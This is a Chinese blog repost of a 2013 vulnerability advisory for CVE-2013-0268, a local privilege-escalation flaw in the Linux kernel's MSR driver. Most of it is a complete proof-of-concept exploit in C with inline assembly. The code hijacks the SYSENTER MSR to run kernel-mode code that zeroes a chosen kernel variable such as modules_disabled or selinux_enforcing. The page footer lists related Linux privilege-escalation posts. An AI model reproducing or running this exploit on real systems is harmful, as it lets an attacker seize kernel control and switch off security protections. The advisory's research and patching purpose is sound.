linux 修改驱动权限,Linux Kernel 'MSR' 驱动程序本地权限提升漏洞

最新推荐文章于 2022-02-17 10:29:38 发布
最新推荐文章于 2022-02-17 10:29:38 发布
阅读量525 收藏
点赞数
文章标签: linux 修改驱动权限

发布日期:2013-02-07

更新日期:2013-03-05

受影响系统:

Linux kernel 2.6.x

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 57838

CVE(CAN) ID: CVE-2013-0268

Linux Kernel是Linux操作系统的内核。

Linux kernel 3.7.6之前版本的arch/x86/kernel/msr.c内,函数msr_open存在漏洞,允许本地用户以root权限执行特制应用绕过目标功能限制,然后以提升的权限执行任意代码。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host

// can do whatever in the commented area, re-enable module support, etc

// requires CONFIG_X86_MSR and just uid 0

// a small race exists between the time when the MSR is written to the first

// time and when we issue our sysenter

// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed

// configured to take a hex arg of a dword pointer to set to 0

// (modules_disabled, selinux_enforcing, take your pick)

//

// Hello to Red Hat, who has shown yet again to not care until a

// public exploit is released.  Not even a bugtraq entry existed in

// their system until this was published -- and they have a paid team

// of how many?

// It's not as if I didn't mention the problem and existence of an easy

// exploit multiple times prior:

// https://twitter.com/grsecurity/status/298977370776432640

// https://twitter.com/grsecurity/status/297365303095078912

// https://twitter.com/grsecurity/status/297189488638181376

// https://twitter.com/grsecurity/status/297030133628416000

// https://twitter.com/grsecurity/status/297029470072745984

// https://twitter.com/grsecurity/status/297028324134359041

//

// spender 2013

#define _GNU_SOURCE

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define SYSENTER_EIP_MSR 0x176

u_int64_t msr;

unsigned long ourstack[65536];

u_int64_t payload_data[16];

extern void *_ring0;

extern void *_ring0_end;

void ring0(void)

{

__asm volatile(".globl _ring0\n"

"_ring0:\n"

".intel_syntax noprefix\n"

".code64\n"

// set up stack pointer with 'ourstack'

"mov esp, ecx\n"

// save registers, contains the original MSR value

"push rax\n"

"push rbx\n"

"push rcx\n"

"push rdx\n"

// play with the kernel here with interrupts disabled!

"mov rcx, qword ptr [rbx+8]\n"

"test rcx, rcx\n"

"jz skip_write\n"

"mov dword ptr [rcx], 0\n"

"skip_write:\n"

// restore MSR value before returning

"mov ecx, 0x176\n" // SYSENTER_EIP_MSR

"mov eax, dword ptr [rbx]\n"

"mov edx, dword ptr [rbx+4]\n"

"wrmsr\n"

"pop rdx\n"

"pop rcx\n"

"pop rbx\n"

"pop rax\n"

"sti\n"

"sysexit\n"

".code32\n"

".att_syntax prefix\n"

".global _ring0_end\n"

"_ring0_end:\n"

);

}

unsigned long saved_stack;

int main(int argc, char *argv[])

{

cpu_set_t set;

int msr_fd;

int ret;

u_int64_t new_msr;

struct sched_param sched;

u_int64_t resolved_addr = 0ULL;

if (argc == 2)

resolved_addr = strtoull(argv[1], NULL, 16);

/* can do this without privilege */

mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);

mlock(&payload_data, sizeof(payload_data));

CPU_ZERO(&set);

CPU_SET(0, &set);

sched.sched_priority = 99;

ret = sched_setscheduler(0, SCHED_FIFO, &sched);

if (ret) {

fprintf(stderr, "Unable to set priority.\n");

exit(1);

}

ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);

if (ret) {

fprintf(stderr, "Unable to set affinity.\n");

exit(1);

}

msr_fd = open("/dev/cpu/0/msr", O_RDWR);

if (msr_fd < 0) {

msr_fd = open("/dev/msr0", O_RDWR);

if (msr_fd < 0) {

fprintf(stderr, "Unable to open /dev/cpu/0/msr\n");

exit(1);

}

}

lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);

ret = read(msr_fd, &msr, sizeof(msr));

if (ret != sizeof(msr)) {

fprintf(stderr, "Unable to read /dev/cpu/0/msr\n");

exit(1);

}

// stuff some addresses in a buffer whose address we

// pass to the "kernel" via register

payload_data[0] = msr;

payload_data[1] = resolved_addr;

printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);

fflush(stdout);

lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);

new_msr = (u_int64_t)(unsigned long)&_ring0;

printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);

fflush(stdout);

ret = write(msr_fd, &new_msr, sizeof(new_msr));

if (ret != sizeof(new_msr)) {

fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n");

exit(1);

}

__asm volatile(

".intel_syntax noprefix\n"

".code32\n"

"mov saved_stack, esp\n"

"lea ecx, ourstack\n"

"lea edx, label2\n"

"lea ebx, payload_data\n"

"sysenter\n"

"label2:\n"

"mov esp, saved_stack\n"

".att_syntax prefix\n"

);

printf("Success.\n");

return 0;

}

建议:

--------------------------------------------------------------------------------

厂商补丁:

Linux

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.kernel.org/0b1331709591d260c1c78e86d0c51c18.png

小小甜饼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现之CVE-2013-4547
Blood_Pupil的博客
03-15 5263
CVE-2013-4547是Nginx中间件的一个文件名解析漏洞 漏洞原理 【注:下文中[]表示字节】 以vulnhub提供的漏洞环境为例,我们首先看一下前端页面 再看一下后端的过滤 目前的情况看来我们不能传后缀名为php这一类的文件,那么我们就把文件后缀名改为jpg吧,然后上传 我们尝试访问下 看来上传成功了,我们得想办法执行,nginx不是把所有后缀名为php的文件交给fastcgi...
linux 程序提权,Linux提权辅助工具
weixin_32746931的博客
05-01 264
前几天有朋友问我找exp,其实有一个很好的程序可以检索你所需的exp--Linux_Exploit_Suggester我记得很多地方也有这款工具的介绍。这款工具也可以看到你当前系统的内核版本。root@Wing:~/Linux-exp# ./Linux-exp.plKernel local: 3.12.Searching among 64 exploits...Possible Exploits:...
linux提权漏洞大全,Linux平台提权漏洞集合
weixin_31943449的博客
05-15 565
CVE-2017-1000367  [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112  [a memory corruption due to UFO to non-UFO path switch]CVE-2017-16939  [UAF in Netlink socket subsystem – XFRM] (Linux kernel before 4....
linux 修改驱动权限,linux设备驱动归纳总结(八):1.总线、设备和驱动
weixin_36476826的博客
05-01 1259
linux设备驱动归纳总结(八):1.总线、设备和驱动xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx这几天一直在看设备模型,内核的代码看得我越来越沮丧,特别是kboject、kset和ktype之间的关系。但是,设备模型的归纳我打算先跳过这几个重要结构体,先介绍总线、设备和...
linux不能加载驱动模块的解决
qq_32783703的博客
12-20 5432
这个周又开始看scull了,希望能在内核层面上做一些有趣的事情 本来不想发这个csdn,但是还是坚持写下来记录下排查问题的过程吧 今天make模块成功后,突然出现了 ERROR: could not insert module main.ko: Operation not permitted 天啊 这到底是什么原因,权限不足吗?自己 sudo make sudo insmod main.ko 发现还是这个问题,于是自己 sudo dmesg -c Linux dmesg命令用于显示开机信息。 kerne
任意地址读写驱动提权(cred、VDSO、modprobe_path、core_pattern、修改内核指针提权)
YJM_____的博客
02-17 759
驱动提权实战 题目网址:https://github.com/bsauce/kernel_exploit_series 业务流程 ioctl 先分析下驱动程序 static long do_ioctl(struct file *filp, unsigned int cmd, unsigned long args) { int ret; unsigned long *p_arg = (unsigned long *)args; ret = 0; switch(cmd) { ... case
illumos-msr:Illumos CPU MSR 驱动程序
06-29
Illumos 的(非常)草案 MSR 访问驱动程序 骨架是 cpuid 驱动程序。 用法 设备文件/dev/cpu/self/msr在与请求的 MSR 对应的偏移量处打开并读取。 返回 64 位。 包括使用各种 MSR 读取英特尔 CPU 内核温度的示例使用...
MATLAB实现MSR算法源码程序.zip
02-17
资源名:MATLAB实现MSR算法源码程序.zip 资源类型:程序源代码 源码说明: 基于MATLAB实现Retinex多尺度图像增强算法(MSR)的程序源码,包含完整源码和注释,非常适合借鉴学习 适合人群:新手及有一定经验的开发...
MICROTEK MSR-1200T48U驱动.zip
07-23
本文将深入探讨关于MICROTEK MSR-1200T48U扫描仪的驱动程序,以及如何正确安装和使用。 MICROTEK是一家知名的扫描仪制造商,其产品MSR-1200T48U是一款高效、高分辨率的平板扫描仪,适用于商业和专业领域。这款扫描...
linux永久提权,Linux 提权-依赖 Exp 篇
weixin_28676983的博客
05-15 354
exp注:CVE-2017-1000367[Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch]CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14)CVE-20...
Linux提权列表
weixin_30748995的博客
08-30 265
#CVE  #Description  #Kernels CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494  [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2016-5195  [Dirty cow] (Linux...
linux提权辅助工具(一):linux-exploit-suggester.sh
weixin_30799995的博客
01-10 2345
来自:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh #!/bin/bash # # Copyright (c) 2016-2018, mzet # # linux-exploit-suggester.sh comes with AB...
Linux kernelmsr_open’函数安全漏洞
weixin_30682415的博客
02-21 121
漏洞名称: Linux kernelmsr_open’函数安全漏洞 CNNVD编号: CNNVD-201302-256 发布时间: 2013-02-20 更新时间: 2013-02-20 危害等级: 中危 漏洞类型: 权限许可和访问控制 威胁类型: 本地 CVE编号: ...
DPDK精准测量时间
杰特JET的博客
04-17 2518
DPDK精准测量时间DPDK实现方式实际操作参考链接 DPDK实现方式 简单来说就是通过rdtsc指令来获取CPU启动起来的tick值,进行减法,然后结合频率来得到时间差。 对应到spdk里面的话就是spdk_get_ticks和spdk_get_ticks_hz. spdk_get_ticks最终会调用到rte_rdtsc,其实现如下: //dpdk/lib/librte_eal/common/include/arch/x86/rte_cycles.h static inline uint64_t rt
线程绑定CPU核详解
weixin_42031299的博客
03-04 1万+
线程绑定CPU核的意义: 在多核CPU中合理的调度线程在各个核上运行可以获得更高的性能。在多线程编程中,每个线程处理的任务优先级是不一样的,对于要求实时性比较高的线程或者是主线程,对于这种线程我们可以在创建线程时指定其绑定到某个CPU核上,以后这个核就专门处理该线程。这样可以使得该线程的任务可以得到较快的处理,特别是和用户直接交互的任务,较短的响应时间可以提升用户的体验感。 绑定的过程: 几个重要的宏操作: 一个线程的CPU亲合力掩码用一个cpu_set_t结构体来表示一个CPU集合,下面的几个宏分别对
线程绑定CPU核
热门推荐
honey_yyang的专栏
08-09 2万+
Linux系统提供API函数sched_setaffinity和sched_getaffinity用于设置或获取线程的可以使用的CPU核。 int sched_setaffinity(pid_t pid, unsigned int cpusetsize, cpu_set_t *mask); 这个函数中pid表示需要设置或获取绑定信息的线程id(或进程id),如果为0,表示对当前调用的线程进行设
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值